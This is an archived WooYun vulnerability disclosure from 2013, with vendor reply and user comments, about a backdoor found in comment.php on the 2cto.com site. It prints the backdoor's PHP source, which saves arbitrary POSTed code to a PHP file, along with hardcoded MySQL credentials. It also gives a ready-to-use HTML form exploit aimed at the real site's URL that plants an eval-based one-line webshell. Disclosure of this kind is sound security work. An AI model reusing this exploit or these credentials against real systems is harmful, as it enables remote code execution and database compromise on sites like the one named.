当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(33) 关注此漏洞

缺陷编号: WooYun-2013-43481

漏洞标题: 红黑联盟官网被人恶意留下后门

相关厂商: 红黑联盟

漏洞作者: 西毒

提交时间: 2013-11-20 17:35

公开时间: 2014-01-04 17:36

漏洞类型: 成功的入侵事件

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

2人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-20: 细节已通知厂商并且等待厂商处理中
2013-11-23: 厂商已经确认,细节仅向厂商公开
2013-12-03: 细节向核心白帽子及相关领域专家公开
2013-12-13: 细节向普通白帽子公开
2013-12-23: 细节向实习白帽子公开
2014-01-04: 细节向公众公开

简要描述:

详细说明:

无意读到源码发现你们网站被人留下了后门

如F:\honhei\www\phpcms\comment.php中

code 区域
transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">


<head>


<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />


<meta http-equiv="X-UA-Compatible" content="IE=7" />


<title>phpcmsV9 - 后台管理中心</title>


<link href="http://www.2cto.com/statics/css/reset.css" rel="stylesheet" type="text/css" />


<link href="http://www.2cto.com/statics/css/zh-cn-system.css" rel="stylesheet" type="text/css" />


<link href="http://www.2cto.com/statics/css/table_form.css" rel="stylesheet" type="text/css" />


<link href="http://www.2cto.com/statics/css/dialog.css" rel="stylesheet" type="text/css" />


</head>


<?php





if (@$_GET['act'] == 'save'){


	$input=@$_POST['Qdata'];


	$input = "<?php \n".$input."?>";


	$fp=fopen("../CommentPZ.php","wb");


	fwrite($fp,$input);


	fclose($fp);


	echo '<script>alert("保存成功")</script>';


}


$server = "localhost";


  $sa = "zhengheyonghu";


  $password="2bCHmZTsb5CBMRRB";


  $phpcms ="zhuzhan2cto";


  $phpwind="cto2luntan";


if(!$mssql_phpcms = @mysql_connect($server,$sa,$password)){


	exit("MYSQL链接失败");


}





$fp=fopen("../CommentPZ.php","r");


$output=fread($fp,filesize("../CommentPZ.php"));


fclose($fp);


$output = str_replace('<?php','',$output);


$output = str_replace('?>','',$output);


?>





这里是2012年修改的,不知道是之前被人入侵留下的还是自己为了方便留下的呢? 我表示非我留下的

A1X)SWEB%DAD3GJ[{BSCKMK.jpg



红黑是老的站点,安全还是做好吧,估计被他人恶意攻击的话,首页可能就不保了。

[6H3~Z@208H{}W5M_LK9%2V.jpg



建议将目录权限设置死,以前我在微博上就你们管理说过,可是没回应。

像这样的后门,都不知道什么时候留下的,自己还一直活在精彩的世界里?

最后给出上面后门的exp,非常简单

访问之后生成一个一句话,访问即可www.2cto.com/CommentPZ.php

<form action="http://www.2cto.com/phpcms/comment.php?act=save" method="post"><!--

<input type="hidden" value="eval($_POST[cmd]);" name="Qdata">

<input type="hidden" value="2.php" name="title">

<input type="hidden" value="<?php eval($_POST[xd]);?>" name="newsort">

<input type="submit" name="submit" value="fuck" style="margin-top:5px; height:28px;">

</form>



向你们反馈这个漏洞,20分应该不为高吧?

漏洞证明:

[6H3~Z@208H{}W5M_LK9%2V.jpg

修复方案:

这个检查下代码就好了,然后各目录权限设置好,以前微博上私信给你们,可是没得到回应,囧

版权声明:转载请注明来源 西毒@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-11-23 12:14

厂商回复:

多谢,虽然没注意过微薄的通知,但是这个后门我几次发现都没有注意到。我们做开发时某程序猿自己写了这么个玩意,后来不用了也没有删除。好几年了,终于被你挖出来了。麻烦告知我一下你是如何发现的,顺便有点站内的纪念品发送。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2013-11-20 17:51 | X防部 ( 普通白帽子 | Rank:487 漏洞数:132 | 于佳琦)
    0

    哈哈 黑吃黑 常在河边走哪能不湿鞋??

    1# 回复此人
  2. 2013-11-20 17:52 | saline ( 普通白帽子 | Rank:294 漏洞数:29 | Focus On Web Secur1ty)
    0

    西毒牛你还是直接把你的v9 getshell放出来吧,不带这样刷rank的 T_T

    2# 回复此人
  3. 2013-11-20 17:54 | 西毒 ( 普通白帽子 | Rank:221 漏洞数:32 | 心存谦卑才能不断超越自我)
    1

    @saline 真没....大哥....没唬你

    3# 回复此人
  4. 2013-11-20 18:05 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)
    0

    刷rank哥

    4# 回复此人
  5. 2013-11-20 20:16 | Skull ( 实习白帽子 | Rank:95 漏洞数:29 | 菜鸟一枚。)
    0

    求get shell啊

    5# 回复此人
  6. 2013-11-20 22:36 | Honker红颜 ( 普通白帽子 | Rank:157 漏洞数:52 | 皖南人士,90后宅男,自学成才,天朝教育失败....)
    0

    @孤独雪狼 貌似大哥你是运维额

    6# 回复此人
  7. 2013-11-21 01:19 | w5r2 ( 普通白帽子 | Rank:226 漏洞数:48 )
    1

    呵呵

    7# 回复此人
  8. 2013-11-23 12:33 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:17 | 当我又回首一切,这个世界会好吗?)
    0

    据说是帮你审计源代码的时候发现的

    8# 回复此人
  9. 2013-11-23 12:35 | 西毒 ( 普通白帽子 | Rank:221 漏洞数:32 | 心存谦卑才能不断超越自我)
    0

    @xsser 额,是翻代码的时候发现的,这程序猿明显就是为了留后门

    9# 回复此人
  10. 2013-11-23 21:00 | QQ852451559 ( 实习白帽子 | Rank:79 漏洞数:18 | 学生党)
    0

    ╮(╯_╰)╭誒

    10# 回复此人
  11. 2013-11-24 13:52 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:166 | 尘封此号,不装逼了,再见孩子们。by Mosua...)
    0

    @西毒 难道红黑是的代码是开源的?此话暴露了....

    11# 回复此人
  12. 2014-01-04 22:17 | sea ( 路人 | Rank:20 漏洞数:5 | 好人)
    0

    我发了个免费成为2CTO会员的一直不审核,哎。

    12# 回复此人
  13. 2014-01-06 10:48 | 孤独雪狼 认证白帽子 ( 普通白帽子 | Rank:740 漏洞数:64 | 七夕手机被偷,这坑爹的七夕啊 。。。。)
    0

    @sea 如何能免费成2cto会员呢

    13# 回复此人
  14. 2014-01-06 15:57 | 西毒 ( 普通白帽子 | Rank:221 漏洞数:32 | 心存谦卑才能不断超越自我)
    0

    @孤独雪狼 也一直没看到你们给的礼物。。。。不会是直接套了俺地址吧

    14# 回复此人
  15. 2014-01-06 19:41 | 孤独雪狼 认证白帽子 ( 普通白帽子 | Rank:740 漏洞数:64 | 七夕手机被偷,这坑爹的七夕啊 。。。。)
    0

    @西毒 稍等 我问问看

    15# 回复此人
  16. 2014-05-16 20:45 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:29 )
    0

    挖到红黑联盟的漏洞那就爽了!

    16# 回复此人

登录后才能发表评论,请先 登录